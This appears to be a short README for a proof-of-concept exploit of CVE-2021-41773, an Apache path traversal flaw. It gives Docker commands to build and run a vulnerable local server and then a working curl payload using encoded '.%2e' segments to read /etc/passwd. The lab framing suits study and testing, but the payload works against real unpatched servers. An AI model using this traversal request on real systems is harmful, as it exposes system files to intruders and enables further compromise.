CVE-2021-41773 exploit PoC with Docker setup.## CVE-2021-41773 exploit PoC with Docker setup.
CD into the directory containing the Apache configuration and Dockerfile (shared in repo).
Building Image: ~# docker build -t cve-2021-41773:1.0 .
Running the Docker Image: ~# docker run --rm -d -p 4444:80 cve-2021-41773:1.0 (Note: You can also use Image ID instead of image name, find Image details using command 'docker images')
Test service: ~# curl localhost:4444
Exploit service: ~# curl localhost:4444/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
[4.0K] /data/pocs/340fab773f6fd759535da6cd4a2bf22fae465cbb
├── [ 21K] apache-config.txt
├── [ 80] Dockerfile
└── [ 511] README.md
0 directories, 3 files